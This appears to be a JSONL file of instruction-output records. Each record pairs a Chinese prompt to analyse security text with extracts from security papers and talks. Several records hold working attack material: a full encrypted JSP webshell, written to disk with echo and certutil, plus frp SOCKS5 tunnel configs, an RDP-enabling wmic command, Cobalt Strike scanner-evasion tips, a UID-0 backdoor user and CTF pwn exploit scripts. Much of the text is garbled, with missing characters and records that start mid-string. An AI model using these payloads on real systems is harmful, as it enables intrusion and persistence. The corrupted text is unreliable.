正确设置Java路径后户可以执此件只需双 击它或按件上的Enter键要部署的应程序将运其安装程序 例如 诺基亚OVI套件通常使这种部署 形式 作为彼此的JAVA包如果您将其重命名为ZIP并打开内容则可以检查包中的类 dnsns.jar 即DNS naming service ,提供DNS地址服务的包只有2个法 getHostByAddr和 lookupAllHostAddr jaccess.jar 定义Assistive Technologies.AWTAbstract Window Toolkit使的JDK实程序类 javaws.jar JNLPJava Network Launching Protocol 是java提供的种可以通过浏览器直接执java应程序的途径 jce.jar java类库是java发布之初就确定了的基础库 javax类库则是在上增加的层东就是为了保持版本兼容 要保存原来的但有些东有了更好的解决案 所以就加上些典型的就是awt(Abstract Windowing ToolKit) 和swing 这个包都是加密相关的 jfr.jar 和 jdk\\bin\\jmc.exe有关系Java Mission Control 包括 JMX 控制台和 Java 记录器 Java 记录器 (JFR) 是个于收集有关正在运的 Java 应程序的诊断数据和概要分析数据的具它集成到 Java 虚拟 机 (JVM) 中 乎不会带来性能开销因此甚可以在负载产环境中使使默认设置时内部测试和 客户反馈表明性能影响低于 1% 对于些应程序这数字会幅降低但是对于短时间运的应程 序 (不是在产环境中运的应程序类型) 相对的启动和预热时间可能会较这对性能的影响可能会超过 1%JFR 收集有关 JVM 及其上运的 Java 应程序的数据 jfxrt.jar JDK有个 rt.jar 是存储JAVA语核类的的这个jfxrt.jar就相当于JavaFX的rt.jar. JavaFX是组图形和媒体 包使开发员能够设计创建测试调试和部署在不同平台上致运的富客户端应程序在jdk最新的 发版当中javafx的包已经被移除了 jfxswt.jar 也是和J", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n[common] bind_port = 9001 [common] server_addr = server_port = 9001 #Web [socks5] type = tcp remote_port = 8088 plugin = socks5 use_encryption = true use_compression = true #socks5 plugin_user = test plugin_passwd = pentest123 echo <%@page import=\"java.util.*,javax.crypto.*,javax.crypto.spec.*\"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.le ngth);}}%><%if (request.getMethod().equals(\"POST\")){String k=\"e45e329feb5d925b\";/*32md516rebeyond*/session.putValue(\"u\",k);Cipher c=Cipher.getInstance(\"AE S\");c.init(2,new SecretKeySpec(k.getBytes(),\"AES\"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstan ce().equals(pageContext);}%> > C:\\apache-tomcat\\webapps\\docs\\123.jsp base64echo PCVAcGFnZSBpbXBvcnQ9ImphdmEudXRpbC4qLGphdmF4LmNyeXB0by4qLGphdmF4LmNyeXB0by5zcGVjLioiJT48JSFjbGFzcyBVIGV4dGVuZHMgQ2xhc3NMb2FkZXJ7VShDbGFzc0xvYWRlciBjKXtzdXBlci hjKTt9cHVibGljIENsYXNzIGcoYnl0ZSBbXWIpe3JldHVybiBzdXBlci5kZWZpbmVDbGFzcyhiLDAsYi5sZW5ndGgpO319JT48JWlmIChyZXF1ZXN0LmdldE1ldGhvZCgpLmVxdWFscygiUE9TVCIpKXtTdHJpbmcgaz0iZTQ1ZTMyOWZlYjVkOTI1YiI 7Lyq4w8Pc1L/OqsGsvdPD3MLrMzLOu21kNda1tcTHsDE2zrujrMSsyM/BrL3Tw9zC63JlYmV5b25kKi9zZXNzaW9uLnB1dFZhbHVlKCJ1IixrKTtDaXBoZXIgYz1DaXBoZXIuZ2V0SW5zdGFuY2UoIkFFUyIpO2MuaW5pdCgyLG5ldyBTZWNyZXRLZXlT cGVjKGsuZ2V0Qnl0ZXMoKSwiQUVTIikpO25ldyBVKHRoaXMuZ2V0Q2xhc3MoKS5nZXRDbGFzc0xvYWRlcigpKS5nKGMuZG9GaW5hbChuZXcgc3VuLm1pc2MuQkFTRTY0RGVjb2RlcigpLmRlY29kZUJ1ZmZlcihyZXF1ZXN0LmdldFJlYWRlcigpLnJlY WRMaW5lKCkpKSkubmV3SW5zdGFuY2UoKS5lcXVhbHMocGFnZUNvbnRleHQpO30lPg== > C:\\windows\\temp\\shell.txt certutil webshellcertutil -f -decode \"C:\\windows\\temp\\shell.txt\" \"C:\\apache-tomcat\\webapps\\docs\\shell.jsp\" 将 拷贝到  wmic path win32_terminalservicesetting where(__CLASS != \"\") call setallowtsconnections 1 [common] bind_port = 9001 [common] server_addr = 192.168.22.131 server_port = 9001 #Web [socks5] type = tcp remote_port = 8088 plugin", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n关于CobaltStrike的Stager被扫问题 随着CobaltStrike下文简称CS的广泛应用各种检测脚本和空间测绘扫描系统都盯上了CS作为夹 缝中求存的公鸡队红队不得不反击一波 下面是检测的手法和相关文章还不清楚的兄弟可以阅读下 https://github.com/whickey-r7/grab_beacon_config https://mp.weixin.qq.com/s/BLM8tM88x9oT4CjSiupE2A 这个检测手法其实不是什么秘密我们看下代码 很清晰很明白我解释一下就是请求stager的时候只要符合以上规则的url就可以成功请求到stager 的代码 公鸡队的兄弟们对抗的方法有2种 方法1修改WebServer.class中的此次函数校验的值不要是9293改个其他值识别脚本就搞不出 来了 方法2kill掉如图所示的stager就行了 在我把以上2个方法发了朋友圈以后有一些同学提出了不同方法和不足 杠A修改C2profile中的stager url 答这样是不行的 杠B反向代理 答是可以的但是都需要结合其他相对负责的各种配置来限制访问 杠C如果只修改校验值由于算方法限制校验值有大小限制也就是枚举256次就枚举出来 答是这样的方法1确实有这样的问题;建议使用方法2 杠D删除了stager监听那分阶段就不能上线了和修改host_stage配置有什么区别 答方法2就是为了灵活处理要用的时候开启不用的时候关闭关闭方法已经说了怎么再开启呢 答案是在Listeners中选择监听点编辑不用修改再保存然后就又开启了 最后我要说用方法2的原因是简单方便在搞小活动的时候用简单的方法最高效不要和我杠各种前 置搞大活动肯定是需要基础设施部署的小活动我认为搞那么大动静并不高效 补充下关于CobaltStrike的Stager被扫问题的问题在星球有个小伙伴说他kill了还是能使用 stager我去测试发现真的是前提是你使用了c2profile在里面配置了stager相关的url和配置当你 kill掉sites中的监听可以防止被扫描但是还不影响c2profile中的配置我感觉现在就完美了在 c2profile中配置好stager自定义的url然后kill掉sites中默认的stager监听即防止了被扫也不妨碍分阶 段的使用完美", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nmesg === 设置当前终端的写权限 ## 补充说明 **mesg命令** 用于设置当前终端的写权限即是否让其他用户向本终端发信息将mesg设置y时其他用户可利用write命令将信息直接显示在您的屏幕上 ### 语法 ```shell mesg(参数) ``` ### 参数 y/ny表示运行向当前终端写信息n表示禁止向当前终端写信息 ### 实例 ```shell [root@localhost ~]# mesg y #允许系统用户将信息直接显示在你的屏幕上 [root@localhost ~]# mesg n #不允许系统用户将信息直接显示在你的屏幕上 ```", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n本文翻译自Offensive WMI - Interacting with Windows Registry (Part 3) :: 0xInfection's Blog  Random ramblings of an Infected Geek. 这是 WMI 攻击手法研究系列第三篇本文将重点介绍与 Windows 注册表的交互在开始之前需要了解 的一件事情是MITRE ATT&CK 对查询注册表 (Query Registry) 归类于 T1012 以及它的修改 (Modify Registry) 归类于 T1112 一Windows 注册表是什么 简单来说注册表是一个存储操作系统配置设置的数据库内核设备驱动程序服务SAM用户界 面和第三方应用程序都使用注册表这使得注册表成为攻击者非常关注的一个点 注册表由称为 hives 的部分组成例如 HKEY_LOCAL_MACHINE  HKEY_CURRENT_USER 等检查 regedit.exe 中的注册表后它们的排列方式似乎与文件系统类似每个 hive 都有许多键键可以有 多个子键键或子键用来存储值注册表项由名称和值组成成一对 二注册表 & WMI WMI 提供了一个名为 StdRegProv 的类用于与 Windows 注册表交互有了这个我们可以做很多事 情包括检索创建删除和修改键和值这里需要注意的重要一点是我们需要使用 root\\DEFAULT 命名空间来处理注册表 让我们开始探索吧 Get-WmiObject -Namespace root\\default -Class StdRegProv -List | select - ExpandProperty methods Variable Value Hive $HKCR 2147483648 HKEY_CLASSES_ROOT $HKCU 2147483649 HKEY_CURRENT_USER $HKLM 2147483650 HKEY_LOCAL_MACHINE $HKUS 2147483651 HKEY_USERS $HKCC 2147483653 HKEY_CURRENT_CONFIG Method Data Type Type Value Function GetStringValue REG_SZ 1 返回一个字符串 GetExpandedStringValue REG_EXPAND_SZ 2 返回对 env 变量的扩展引 用 GetBinaryValue REG_BINARY 3 返回字节数组 GetDWORDValue REG_DWORD 4 返回一个 32 位的数值 GetMultiStringValue REG_MULTI_SZ 7 返回多个字符串值 GetQWORDValue REG_QWORD 11 返回一个 64 位的数值 在上图中我们可以看到一些与注册表交互的方法比如 CreateKey  DeleteKey  EnumKey  EnumValues  DeleteValues 等这很有趣 进入之前需要了解的两件重要事情首先WMI 使用常量数值来标识注册表中的不同配置单元下表列 出了访问注册表配置单元的常量 其次注册表具有不同的数据类型并且可以使用 WMI 中的特定方法访问每种数据类型下表将常见 数据类型与它们的方法的对应关系 2.1 查询注册表 2.1.1 枚举键 现在我们知道了常量让我们尝试枚举一个众所周知的注册表路径 HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion 下的可用子项把我们 目前所知道的放在一起可以使用以下这个命令来获取注册表项下的所有键 注意对于上层层次的注册表路径也可以这样做如果不知道绝对路径可以通过简单地替换上面命令 中的路径来浏览注册表例如如果将上述命令中的路径 software\\microsoft\\windows nt\\currentversion\\schedule 替换为 software 则输出将列出 HKEY_LOCAL_MACHINE\\Software 下的所有子项这在探索注册表中的未知嵌套项时很有帮助 2.1.2 枚举值 现在我们知道如何列出注册表项下可用的键让我们枚举 Drivers32 键下的值 正如我们所见输出包含 sNames 下的子项名称和 Types 属性下的关联数据类型当然也可以使用 Powershell 的 select -ExpandProperty 选项参数来扩展输出中返回的属性值 Invoke-WmiMethod -Namespace root\\default -Class stdregprov -Name EnumKey @(2147483650, ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# T1136-001-linux-创建用户 ## 来自ATT&CK的描述 攻击者拥有足够的访问权限可以创建本地账户或者域账户此类账户可以用于权限维持持久性不需要在系统上部署后门工具来实现权限维持 这些Net user命令可用于创建本地或域账户 ## 测试案例 useradd -o -u 0 -g 0 -M -d / root -s / bin / bash{用户名} ## 检测日志 /var/log/auth.log 如果可以的话我更希望你能够使用audit日志进行检测它会很方便 ## 测试复现 icbc@icbc:/$ sudo useradd -o -u 0 -g 0 -M -d /root -s /bin/bash abc(用户名) icbc@icbc:/$ cat /etc/passwd root: x:0:0:root:/root:/bin/bash ...... abc: x:0:0:root:/root:/bin/bash ## 测试留痕 icbc@icbc:/$sudo cat /var/log/auth.log Aug 9 13:42:33 icbc sudo: icbc : TTY=pts/0 ; PWD=/ ; USER=root ; COMMAND=/usr/sbin/useradd -o -u 0 -g 0 -M -d /root -s /bin/bash abc Aug 9 13:42:34 icbc sudo: pam_unix(sudo:session): session opened for user root by (uid=0) Aug 9 13:42:34 icbc useradd[18979]: new user: name=abc, UID=0, GID=0, home=/root, shell=/bin/bash ## 检测规则/思路 ``` Root Account Creation: index=linux source=\"/var/log/auth.log\" eventtype=useradd UID=0 OR GID=0 ``` ## 相关TIP [[T1136-001-win-创建本地账户]] ## 参考推荐 MITRE-ATT&CK-T1136-001 <https://attack.mitre.org/techniques/T1136/001/> linux命令详解之useradd命令使用方法 <https://blog.csdn.net/u011537073/article/details/51987121>", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAbusing Sast Tools @DEFCON When scanners do more than just scanning Who am I? Rotem Bar Head of Marketplace @ Cider Security - Bug Bounty Researcher - Cyber Paladin @rotembar Security Engineers A person that tells others where they have problems, and helps them fix them. DevOps Engineers who are in charge of large scale deployments. SAST Builders Developers who have decided to automate their efforts for finding security bugs. Bad Guys People who have decided to harm other people for a living. Target Audience SAST 101 01 How Scanners Work 02 Hacking Time 04 What is the Impact 05 Previous Research 03 Conclusions 06 Table of Contents SAST 101 01. Static Application Security Testing Static program analysis is the analysis of computer software that is performed without actually executing programs Wikipedia https://en.wikipedia.org/wiki/Static_program_analysis Why do we Run SAST? 1. Stop bad security practices 2. Prevent infrastructure mistakes 3. Assess code security 4. Create Standardization and consistency SAST Pros VS Cons FAST Can run on source code without any need to compile False Positives Cannot validate findings SAFE Does not execute code Hard to track flow control Some languages are almost impossible to track statically EASY Can be run on code, without the need for more resources How Scanners Work 02. High Level Overview Code Parses files in folder and searches for matching extensions AST Converts code into AST structures Processing Runs predefined rules on AST with flow control analysis Results Creates results based on user configuration 01 02 03 04 Log(1 + 2* 3) Sample AST BASIC Rule if typeof expression = CallExpression and expression.callee.name = log and expression.arguments.length > 0 Then Found a log function with more than one argument Can Get Complex if typeof expression = CallExpression and expression.callee.name = log and expression.arguments.length > 0 Then SOURCE = express.arguments[0] if typeof expression = CallExpression and expression.callee.nam", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nEMET 4.0 PKI MITIGATION Neil Sikka DefCon 21 ABOUT ME  Security Engineer on MSRC (Microsoft Security Response Center)  I look at 0Days  EMET Developer  I enjoy doing security research on my free time too: http://neilscomputerblog.blogspot.com/  Twitter: @neilsikka OVERVIEW 1. What Is EMET? 2. New Features in EMET 4.0 3. EMET Architecture 4. PKI Feature In Depth 5. PKI Demo WHAT IS EMET?  Mitigates various exploitation techniques  Not signature basedbehavior based  Things like stopping shellcode from reading Export Address Table etc  DLLs dynamically loaded at runtime  No application recompiling/redeploying necessary  Can help mitigate 0Days  Works as far back as Windows XP  Giving back to the security community  Its Free COMPATIBLE APPLICATIONS CHANGES BETWEEN EMET 3.0/4.0  We added Certificate Trust (PKI) Mitigations   Our first non memory corruption mitigation  Some ROP Hardening (Deep Hooks, Antidetours, Banned Functions)  ROP Mitigations  New GUI SHELLCODE MITIGATIONS  DEP  Call SetProcessDEPPolicy  HeapSpray  Reserve locations used by heap sprays  Mandatory ASLR  Reserve module preferred base address, causing loader to load module somewhere else  NullPage  Reserve first memory page in process, defense in depth  EAF  Filter shellcode access to Export Address Table (kernel32 and ntdll)  BottomUp Randomization  Randomize data structure bases MORE SHELLCODE MITIGATIONS  SEHOP-validate SEH chain looking for _EXCEPTION_REGISTRATION structure whose prev pointer is -1  ROP Hardening  Deep Hooks-protect critical APIs and the APIs they call  AntiDetours-protect against jumping over detoured part of a function  Banned Functions-disallow calling ntdll!LdrHotpatchRoutine ROP MITIGATIONS  ROP (Detour functions that are commonly ROPed to)  LoadLib  Make sure we are not trying to call LoadLibrary() on a network location  MemProt  Make sure we arent making stack pages executable  Caller  Make sure return address on stack was proceeded by a call  Make sure we didnt ret to this f", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nTQLCTF Writeup By Nu1L Author:Nu1L TQLCTF Writeup By Nu1L Pwn unbelievable_write nemu ezvm timezone_challenge Reverse Tales of the Arrow Misc wizard Ranma½ the Ohio State University wordle Web Simple PHP Crypto Signature OTP Pwn unbelievable_write 可以任意offset freefree掉tcache pthread struct然后打got from pwn import * # s = process(\"./pwn\") s = remote(\"119.23.255.127\",\"20144\") s.sendlineafter(\">\",\"2\") s.sendline(\"-656\") # gdb.attach(s,\"b c3\\nc\") s.sendlineafter(\">\",\"1\") s.sendline(str(0x280)) payload = p64(0x404018)*0x40+p64(0x404080)*0x40 s.sendline(payload) s.sendline(\"1\") s.sendline(str(0xa0)) elf = ELF(\"./pwn\") payload = p64(0x4013BE)+p64(0x401040)+p64(0x401050) nemu bss上pmem的溢出 在pmem上构造UB chunk然后覆盖line_read, 通过rl_gets()进任意地址free, 在pmem上写libc地址 打free_劫持WP空闲链表, 完成任意地址分配WP对象, 分配到__free_hook 之后利再次覆盖free_为system地址, 利函数free_wp()的链表插操作覆盖hook 再次利任意地址free执cat flag s.sendline(payload) s.sendline(\"1\") s.sendline(str(0x320)) s.sendline(\"1111\") s.sendline(\"3\") s.interactive() #! /usr/bin/python # coding=utf-8 import sys from pwn import * import requests context.log_level = 'debug' context(arch='amd64', os='linux') def Log(name): log.success(name+' = '+hex(eval(name))) elf = ELF('./nemu') libc = ELF(\"./libc.so.6\") if(len(sys.argv)==1): #local cmd = [\"./nemu\"] sh = process(cmd) else: #remtoe sh = remote(\"47.107.29.210\", 25127) def GDB(): gdb.attach(sh, ''' set directories ./nemu_source_code/nemu/ telescope 0x86A3FC0 telescope 0x00000000086a3f30 #break make_token break rl_gets #conti ''') def Cmd(n): sh.sendline(n) def WriteBss(offset, val): Cmd('set 0x%x 0x%x'%(offset, val&0xFFFFFFFF)) val>>=32 Cmd('set 0x%x 0x%x'%(offset+4, val)) #get UB chunk in pmem Cmd(\"set 0x8 0x101\") Cmd(\"set 0x108 0x21\") Cmd(\"set 0x128 0x21\") #free(UB chunk) Cmd(\"set 0x8000b60 0x6A3b90\") #leak libc addr Cmd(\"x 0x19\") sh.recvuntil('0x00000019\\t') ub_addr = int(sh.recvuntil('\\n').strip()+'68', 16) + 0x7F0000000000 Log('ub_addr') libc.address = ub_addr - 0x3c4c68 Log('libc.address') #__free_hook => system pmem ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nJava 代码审计常用漏洞总结 1.1 审计方法总结 主要代码审计方法是跟踪用户输入数据和敏感函数参数回溯 跟踪用户的输入数据判断数据进入的每一个代码逻辑是否有可利用的点此处的代码逻辑 可以是一个函数或者是条小小的条件判断语句 敏感函数参数回溯根据敏感函数逆向追踪参数传递的过程这个方法是最高效最常用 的方法大多数漏洞的产生是因为函数的使用不当导致的只要找到这些函数就能够快速 挖掘想要的漏洞 以下是基于关键词审计技巧总结 在搜索时要注意是否为整个单词,以及小写敏感这些设置 漏洞名称 关键词 密码硬编码密码明文存储 password passjdbc XSS getParamter<%=param. SQL 注入 SelectDao from delete updateinsert 任意文件下载 download fileName filePathwritegetFilegetWriter 任意文件删除 DeletedeleteFilefileName filePath 文件上传 UploadwritefileName filePath 命令注入 getRuntimeexeccmdshell 缓冲区溢出 strcpy,strcat,scanf,memcpy,memmove,memeccpy Getc(),fgetc(),getchar;read,printf XML 注入 DocumentBuilderXMLStreamReaderSAXBuilderSAXParser SAXReader XMLReader SAXSource TransformerFactory SAXTransformerFactory  SchemaFactory 反序列化漏洞 ObjectInputStream.readObject ObjectInputStream.readUnsharedXMLDecoder.readObject Yaml.load  XStream.fromXML  ObjectMapper.readValue  JSON.parseObject url 跳转 sendRedirectsetHeaderforward 不安全组件暴露 activityBroadcast ReceiverContent ProviderService inter-filter 日志记录敏感信息 log log.info logger.info 代码执行 evalsystemexec 2.1 可基于关键词审计的漏洞 2.1.1 密码硬编码 审计方法 密码硬编码最容易找直接用 Sublime Text 打开项目目录然后按 Ctrl + Shift + F 进行全局 搜索 password 关键词 2.1.2 反射型 XSS 审计方法反射型 XSS 一般 fortify 一般都能扫描出来 如果是手工找可全局搜索以下关键词 getParamter <%= param. 漏洞代码示例 1. EL 表达式输出请求参数 代码在 170 行和 305 行处获取请求参数中的 groupId 值在未经检查参数合法性的情况 下输出在 JavaScript 代码中存在反射型 XSS 漏洞 2. 输出 getParamter 获取的参数 然后在 224 行打印到如下的 js 代码中 2.1.3 存储型 XSS 审计方法方法有主要有两种 1. 全局搜索数据库的插入语句(关键词insert,save,update)然后找到该插入语句所属的方 法名如(insertUser())然后全局搜索该方法在哪里被调用一层层的跟踪直到 getParamter()方法获取请求参数的地方停止如果没有全局 XSS 过滤器跟踪的整个流 程都没有对获取的参数过滤则存在存储型 XSS 2. 从 getParamter 关键词开始 跟踪请求参数直到插入数据库的语句如果中间没有过 滤参数则存在存储型 XSS 代码中 45 行和 46 行获取 usertype 和 name 的值然后在 56 行存进数据库由于没有过 滤传进来的参数所以会在显示时出来触发 XSS 2.1.4SQL 注入 审计方法 SQL 注入一般 fortify 一般都能扫描出来 手动找的话一般直接搜索 selectupdatedeleteinsert 关键词就会有收获 如果 sql 语句中有出现+ append $ # 等字眼如果没有配置 SQL 过滤文件则判断存 在 SQL 注入漏洞 当找到某个变量关键词有 SQL 注入漏洞时还可以直接全局搜索那个关键词找出类似漏洞 的文件上面中可以直接全局搜索 tableName 关键词 要查找那个页面调用到含有漏洞的代码就要跟踪方法的调用栈以上面的注入点 tableName 为例 双击打开该文件然后查看该", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 Extracting the painful (blue)tooth Matteo Beccaro  Security Consultant at Secure Network  Technical Research Leader at Opposing Force, Physical Security division of Secure Network  @_bughardy_ { Matteo Collura  Student at Politecnico di Torino (www.polito.it)  Electronic Engineer  Researcher in several fields  { @eagle1753 2 Who we are Matteo Beccaro  Security Consultant at Secure Network  Technical Research Leader at Opposing Force, Physical Security division of Secure Network  {@_bughardy_ 3 Who are we Matteo Collura  Student at Politecnico di Torino  Electronic Engineer  Researcher in different fields concerning security (NFC, bluetooth)  Now focusing on social skills (NLP, social engineering..)  { @eagle1753 Index What the hell is Bluetooth?  Wireless standard for exchanging data over short distances.  Short wavelength UHF: 2.4  2.485 GHz  79 channels (usually) + Adaptive Frequency Hopping  Name coming from Harald Bluetooth  Scandinavian humor... Layer protocol architecture What the hell is Bluetooth? Core protocols Cable replacement protocols Telephony control protocols Adopted protocols So many different stacks! LMP, L2CAP, SDP are mandatory!  So many updates!  1.0: Mandatory BD_ADDR  1.1: IEEE Standard (2002)  1.2: Adaptive frequency-hopping spread spectrum resistance to interferences and eavesdropping (theorically )  2.0: EDR (optional) for faster data transfer, GFSK+PSK modulation  2.1: Secure Simple Pairing, Extended Inquiry Response What the hell is Bluetooth? Version 1: Version 2:  So many updates!  3.0: Alternative MAC/PHYs for high data transfer, Unicast Connectionless Data  4.0: Includes now Bluetooth Low Energy protocol (or Smart)  4.1: Limited discovery time, lower consumptions, LE link layer topology  4.2: LE Data packet extension, LE secure connections, Link Layer privacy (really?) What the hell is Bluetooth? Version 4: Version 3: 1. Index Index Known and unknown risks..  BlueSnarf, by Holtmann & Laurie Bluetooth implementation on mobile phones ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Impact of the OpenSSL Infinite Loop Vulnerability (CVE-2022-0778) [中文版本(Chinese version)](README.zh-cn.md) OpenSSL is a software library for applications that secure communications over computer networks against eavesdropping or need to identify the party at the other end. A flaw was found in OpenSSL. It is possible to trigger an infinite loop by crafting a certificate that has invalid elliptic curve parameters. Since certificate parsing happens before verification of the certificate signature, any process that parses an externally supplied certificate may be subject to a denial of service attack. Reference links: - <https://github.com/drago-96/CVE-2022-0778> - <https://www.cnblogs.com/logchen/p/16030515.html> - <https://catbro666.github.io/posts/83951100/> - <https://github.com/yywing/cve-2022-0778> ## Vulnerability environment Execute following command to start a server: ``` docker compose up -d ``` ## Reproduce vulnerability Firstly, use [this project](https://github.com/vulhub/cve-2022-0778) to build and run an evil server. If you don't have the Golang compiler, just use the Docker image: ``` docker run -it --rm -p 12345:12345 yywing/cve-2022-0778 --addr 0.0.0.0:12345 ``` Then you can monitor the CPU usage inside the container through `top`: ``` docker compose exec curl top ``` This vulnerability is available when parsing the certificate, so we can use the cURL to demonstrate it. Entry the environment, and use the cURL to browse the evil server that started before: ``` docker compose exec curl bash curl -k https://host.docker.internal:12345 ``` At this point, cURL will be caught in an infinite loop, and CPU resources will be exhausted unexpectedly: ![](1.png)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# T1558-003-windows-基于SPN凭证获取 ## 来自ATT&CK的描述 攻击者可能滥用有效的Kerberos票证授予票证TGT或嗅探网络流量以获得可能容易受到暴力攻击的票证授予服务TGS票证 服务主体名称SPN用于唯一标识Windows服务的每个实例为了启用身份验证Kerberos要求SPN与至少一个服务登录帐户专门负责运行服务[3]的帐户相关联 拥有有效的Kerberos票证授予票证TGT的攻击者可以向域控制器DC请求任何SPN的一个或多个Kerberos票证授予服务TGS服务票证以使用RC4算法对这些票证的一部分进行加密这意味着与SPN相关联的服务帐户的Kerberos 5 TGS-REP etype 23哈希将用作私钥因此容易受到离线蛮力攻击可能暴露明文凭据的攻击 可以使用从网络流量中捕获的服务票证执行相同的攻击 散列的破解可能会通过访问有效帐户来实现持久性特权升级和横向移动 ### SPN(Service Principal Name)服务主体名 服务主体名称SPN用于唯一标识Windows服务的每个实例要启用身份验证Kerberos要求SPN与至少一个服务登录帐户专门负责运行服务的帐户相关联 拥有有效Kerberos票证授予票证TGT的攻击者可以从域控制器DC请求任何SPN的一个或多个Kerberos票证授予服务TGS服务票证这些票证的一部分可以使用RC4算法加密这意味着与SPN关联的服务帐户的Kerberos 5 TGS-REP etype 23哈希被用作私钥因此容易受到离线暴力破解攻击可能会导致明文凭据泄露 可以使用从网络流量捕获的服务票据来执行相同的攻击 先来介绍一下SpnEndpointIdentity和UpnEndpointIdentity这两个EndpointIdentity是Windows认证下服务身份的两种表现形式前者被称为服务主体名SPNService Principal Name以下简称SPN另一种被称为用户主体名UPNUser Principal Name以下简称UPN 如果你对Kerberos有一定的了解相信一定对SPN不会感到陌生对于一个运行在域环境中某台机器上的服务它能被访问它的客户端认证的先决条件是客户端能够唯一标识该服务而SPN就可以看作是这个标识符在默认的情况下如果服务寄宿进程在机器帐号或者系统帐号比如LocalService, LocalSystem, or NetworkService等下服务身份通过SPN表示如果执行服务寄宿进程的是一个域用户帐户则采用UPN表示服务身份WCF中的SPN和UPN的格式如下如果客户端预先指定SPN/UPN表示服务身份它通过执行服务寄宿进程帐号对应的Windows凭证和SPN/UPN进行比较从未确定服务运行在预先设定的机器或者某个域用户帐号下 详细介绍你可以参考WCF安全系列<https://www.cnblogs.com/artech/archive/2011/06/12/Authentication_043.html> ## 测试案例 ### SPN攻击原理 Active Directory环境中发现服务的最佳方式是通过**SPN扫描** 攻击者通过SPN扫描的主要作用是不需要连接到网络上的每个IP以检查服务端口SPN扫描通过LDAP查询域控制器以便发现服务由于SPN查询是正常Kerberos票证执行的一部分所以很难被安全设备探测到而network端口扫描是相当明显的容易被发现 即使您不完全了解Kerberos的内部工作原理攻击过程也可归纳为 1. **扫描Active Directory以设置SPN值的用户帐户** 2. **使用SPN值从AD请求服务票证** 3. **将服务票据提取到内存并保存到文件** 4. **暴力破解攻击这些密码直到破解** 举个例子 1. 利用SPN扫描探测含有SQL服务的主机服务 2. 识别目标后利用piwehsell脚本请求此服务主体名称SPN的服务票据请注意请求的服务票证是具有RC4加密类型 3. 一旦客户端接收到票据以后可以利用mimikatz或其他工具在用户的内存中导出所有kerberos票证不涉及权限提升 4. 最后将票据导出后将票据文件拷贝到正在运行kerberoast的kali linux主机或其他主机利用wordlist密码字典可以进行破解与票据相关的服务账户密码 **注意获得服务票据不需要提高权限也不会向目标发送任何流量** ## 检测日志 windows 安全日志 Netflow流量 ## 测试复现 ### 测试环境准备 windows server 2012域控 需安装powershell AD模块 windows server 2016被控主机 需安装powershell ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nThe Bieber Project Ad Tech and Fraud 101 Mark Ryan Talabis, zvelo zvelo proprietary and confidential Introduction ! Chief Security Scientist, zvelo  Ad Tech Fraud Research ! Formerly, Cloud Email Threat Protection, Fireeye ! Alumni Member, Honeynet Project \" Honeypots/Honeynets ! Author, Elsevier-Syngress \" Information Security Analytics/Risk Management zvelo proprietary and confidential Main Topics ! The Business and Currency of Digital Advertising ! Ad Tech: The Ecosystem ! The Ad Fraud Problem ! Publisher-based Ad Fraud ! Non Human Traffic and the Bieber Project Total digital ad spend is estimated to be $60 billion in 2015 The Business of Digital Advertising The Currency of Digital Advertising ! Primary metric: the number of delivered, or served, impressions ! Primary problem: Not all online ads delivered actually have an opportunity to be seen ! Advertisers are obviously not interested in paying for ads that were never seen Viewable Impressions Clicks Conversions The Currency of Digital Advertising $ The Business of Digital Advertising Reference: ComScore Supply and Demand The Business of Digital Advertising TV Online Advertising VS Ad Tech: The Ecosystem Well, its a bit complicated Ad Tech: The Ecosystem Lets go through the 101 version Advertiser Advertiser Advertiser Advertiser Agency Agency DSP Ad Networks Agency Trading Desk Ad Exchange / SSP Publisher Publisher Publisher Publisher Ad Network DMPs Other data / analytics companies DMPs DMPs Other data / analytics companies Other data / analytics companies Other data / analytics companies DMPs Process of Serving an Ad Campaign Mgmt. System User inputs info into Ad trafficker at DSP/Ad Network, etc. Campaign criteria defined Right dates, budget, CPM rate targeting criteria Creative assets IMG file Video file Javascript tag Other 3rd party pixels 1st party pixels 1. Campaign Setup 2. The Bidding Process Additional custom fields based on partners SSP woks with (e.g. data segments from DMP) DSP / Ad Network Bidder", "category": "text_analysis", "source": "security_papers"}
